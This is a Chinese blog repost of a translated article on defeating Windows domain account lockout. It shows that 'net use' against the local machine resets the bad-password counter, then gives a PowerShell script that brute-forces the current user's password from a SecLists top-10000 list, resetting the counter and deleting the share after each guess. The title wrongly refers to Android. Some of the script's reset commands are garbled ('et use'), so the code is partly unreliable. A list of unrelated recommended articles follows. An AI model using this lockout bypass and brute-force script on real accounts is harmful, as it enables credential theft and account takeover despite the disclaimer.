android域账号认证失败,绕过域账户认证失败锁定次数限制的技巧

最新推荐文章于 2024-05-18 20:07:52 发布
最新推荐文章于 2024-05-18 20:07:52 发布
阅读量493 收藏 1
点赞数
文章标签: android域账号认证失败

原标题:绕过域账户认证失败锁定次数限制的技巧

*本文仅用于教育目的。 切勿在未授权的计算机上进行安全测试。

获取用户帐户密码有很多好方法,这只是另一种方式。 好的,让我们开始吧。核心思路是,用户想要爆破身份验证,他们就可以运行“net use \\%computername%/ u:%username%”命令,该命令可以重新要求身份验证并重置锁定计数。要想进行操作,您需要从Microsoft下载远程服务器管理工具安装该工具后,运行一小段powershell脚本以显示我的JoeUser帐户信息并锁定。

get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto

ef729de9830b5dcb37650eee9342d2ea.png

在我的本地策略中,您可以看到我在3次无效登录尝试后被锁定(我从Microsoft获得的默认安装值)。

64d04c9c457a68adfad4547d29fa34b0.png

接下来我将输入错误的密码,window将记录我的错误次数。

1bcc031e40cd04ac397b70fe766b19ef.png

现在我将使用命令清除错误的密码尝试:“Net use \\%computername%/ u:%username%”注意我没有指定密码。 我已经以用户身份登录,它似乎使用当前用户的上下文进行身份验证,并清除了错误的密码计数!

31c9c9ca46ceaf79405fcb400824b7b3.png

现在我可以使用这种技术爆破密码。 唯一的缺点是我必须在每次设置后删除共享。 例如,现在我已经进行了共享设置,如果我尝试爆破密码,我会收到此消息

b5ea74cd354c4a3fd8f6e9039bf89e90.png

然而只需一条命令即可“Net Use /Delete \\%computername%”

cf6813f6832454fc45ce5a35f87c51b5.png

正式测试,我使用Daniel Miesslers SecLists的前10000名密码列表来爆破。正确的密码也在里面。

$userVar = Get-ChildItem env:username $uname = $userVar.Value $computerVar = Get-ChildItem env:computername $computerName = $computerVar.Value $ErrorActionPreference = "Stop" $hooray = "PasswordNotFoun" $CurrentPath = "C:\Users\Public" $FileName = "10-million-password-list-top-10000.txt" $FName= "$CurrentPath\$FileName" foreach($value in [System.IO.File]::ReadLines($Fname)) { $passAttempt = ('net use \\' + $computerName + ' "' + $value + '"' + '/u:' + $uname ) try { Write-Output ("trying password " + $value) $output = Invoke-Expression $passAttempt | Out-Null $hooray = $value write-output ("FOUND the user password: " + $value) $reset = ('et use \\' + $computername + ' /u:'+ $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('net use /delete \\' + $computername ) Invoke-Expression $deleteShare | Out-Null break } catch { $reset = ('et use \\' + $computername + '/u:' + $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('et use /delete \\'+ $computername ) Invoke-Expression $deleteShare | Out-Null } } write-host "The Password is: "$hooray

af13453f485b14807dba3251e751e0de.png

成功爆破

*参考来源:medium,FB小编周大涛编译,转载请注明来自FreeBuf.COM 返回搜狐,查看更多

责任编辑:

兔斯霁
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Powershell DSC绕过PSSession和账号安全限制
stisom的专栏
08-02 579
这里介绍一种比较Tricky的绕过账号本地安全限制的方式。 利用Powershell DSC执行时使用LocalSystem权限的特点,进而可以通过账号或者ServiceAccount(具有administrator权限), 绕过账号安全限值,进行本地最高权限账户才能进行敏感操作。如之前 在账号的PSSession(WSMan)中执行相关“不受限”的操作,如 使用SQLPS中的In...
关于android 帐号的登录
tuikongbiao5337的博客
12-31 345
android 企业开发,关于帐号登录,SQL Server 数据库连接的相关资料,谢谢
Android完成本地登录以及网络请求实现登录(1)
最新发布
m0_74289031的博客
05-18 665
每个都有各自的优势,在uni中用几行代码就可以完成的操作放在android中就要几十上百行代码,但android原生应用的稳定性是其不能比拟的。新建空的activity,命名为LoginActivity,其中LoginActivity要编写具体的实现内容及方法。一个最基础的登录页面就做好了,现在我们开始编写LoginActivity的内容,activity的内容可以通过FindViewByme插件来生成。页面的布局常用的就是线性布局(LinearLayout)和相对布局(RelativeLayout)。
Android多次认证失败登录锁定功能的实现
进击的小怪兽
10-24 3711
解决的问题:       我们在开发Android app的登录功能时,为了加强app的安全性,很有必要实现这样一种功能,即多次登录认证失败,app锁定,直到一定时间之后才能够允许用户重新认证登录。姑且叫它登录锁吧。       这样的登录锁功能实现基于两个关键点:       1.System.currentTimeMillis()方法用于获取Java虚拟机的当前运行时刻。
Windows 10 用户输入正确的密码却登录失败
thexiaosi的博客
12-22 4247
Windows 10 操作系统,输入正确的密码却一直提示登录失败
Android密码输错次数限制,怎样设置输入多少次错误密码后电脑将锁死 如何设置多次开机密码输入错误锁定电脑...
weixin_30704909的博客
06-01 1540
怎样设置键入几回不正确登陆密码后电脑上将锁起来 怎么设置数次开机密码键入不正确锁住电脑上怎么给电脑设置键入不正确登陆密码5次就锁住15分钟?windows系统软件的电脑怎么设定输入支付密码的频次,键入频次超出特定频次,电脑上便会全自动锁住,该如何设置呢?下边共享详尽的设定方式 ,必须的盆友能够参照下.1、打开文件任务管理器,进到途径C:\ProgramData\Microsoft\Windows\...
Android指纹认证Demo源码
08-20
总的来说,这份"Android指纹认证Demo源码"涵盖了从权限申请、指纹管理器初始化、加密对象创建到认证回调实现的整个流程,是学习和实践Android指纹认证的宝贵资源。通过深入理解和实践这个Demo,开发者能够更好地理解...
使用WebView实现新浪微博Oauth2.0认证android
07-20
Android开发中,有时我们需要集成第三方社交平台的功能,如新浪微博,以便用户能够通过自己的社交账号登录或分享内容。本文将详细介绍如何使用WebView组件实现新浪微博的OAuth2.0认证过程,这是一个安全、便捷的...
android腾讯微博OAUTH2.0认证登陆(含发微博)
09-12
RT,基于OAUTH2.0的腾讯微博认证以及发送微博,代码简洁易懂,方便童鞋们开发需要用到分享信息到腾讯微博功能的应用,具体教程可留意我的CSDN博客http://blog.csdn.net/geniuseoe2012
IOS,Android SSL双向认证HTTPS方式请求及配置证书
10-14
本文将详细介绍如何在`iOS`和`Android`应用中实施SSL双向认证以及配置证书。 一、SSL/TLS协议基础 SSL/TLS协议的主要目标是为网络通信提供加密处理,以防止第三方窃取或篡改信息。HTTPS是HTTP协议与SSL/TLS的结合,...
Android 账户管理代码
09-19
Android系统中,账户管理是应用与用户身份验证和数据同步的关键部分。Android Account Manager是一个系统服务,它为开发者提供了一种安全、便捷的方式来存储和管理用户的账户信息,包括认证凭据,例如用户名和密码...
批量解锁因各种原因被锁定帐号的工具
09-05
安装后打开软件,选择要查询的OU,然后选查询,查询完后可以按字段排列,比如按被锁定的排列,选择要解锁的,后点enable select就可以完成解锁 如果因病毒原因造成大面积帐号锁定,可使用本工具来一次解所有的帐号,当前使用这个工具的帐号要保证没有被锁定,不然是无法查询控的。 这个工具还可以完成删除帐号或计算机、禁用帐户等
密码爆破、验证码绕过
zzhokok的博客
08-27 2777
B/S暴力破解 C/S暴力破解 防爆破方式 账户接管案例: https://xz.aliyun.com/t/6330 验证码安全
关于帐户将计算机加入登陆上限问题
weixin_33866037的博客
09-28 206
问题: 关于帐 户将计 算机加入登 陆上 限问题 解决方法: adsiedt.msc或者脚本 当您尝试从 Windows NT 4.0 Workstation 或 Windows NT 4.0 Server 计算机加入 Windows 2000 ,可能会出现下列错误讯息: The machine account for this computer eit...
AD控如何做帐号锁定策略?AD控利用AD管理中心工具如何做帐号锁定?AD控如何做帐号输错几次之后帐号被锁定呢?
封枫丰
07-24 1801
1,AD控如何做帐号锁定策略? 2,AD控利用AD管理中心工具如何做帐号锁定? 3.AD控如何做帐号输错几次之后帐号被锁定呢?
用户和计算机上解锁用户的账户,AD账户锁定时间
weixin_39667801的博客
06-21 1257
尊敬的客户,您好!感谢您的回复。一、定义:AD中的其它系统基于AD 的ldap 认证,需要账号进行认证,这类账号叫“服务账号”?>>这类账号就是普通的用户账号。我们一般随便新建一个AD 账号,设置账号永不过期,密码不修改,还需要其它设置?>>一般新建一个AD用户账号,就是指定账号名字和密码就可以了。二、如何设置服务账号?请问您是咨询怎么创建服务账号吗?如果是的话,以...
暴力破解之绕过登录次数限制,同时根据响应时间判断有效的用户名
weixin_43618066的博客
11-19 6743
一.尝试输入账户密码,根据错误消息判断
:“登录失败。该登录名来自不受信任的,不能与 Windows 身份验证一起使用。”
热门推荐
終99 的博客
12-12 1万+
将配置中数据库连接字符串中的:integrated security=false 即可
"Android备份文件口令认证改进与安全性分析
In the document "Android Backup File Password Authentication Mechanism Security Analysis and Improvement.pdf", the security of cryptographic schemes is evaluated under two main models: unconditional ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值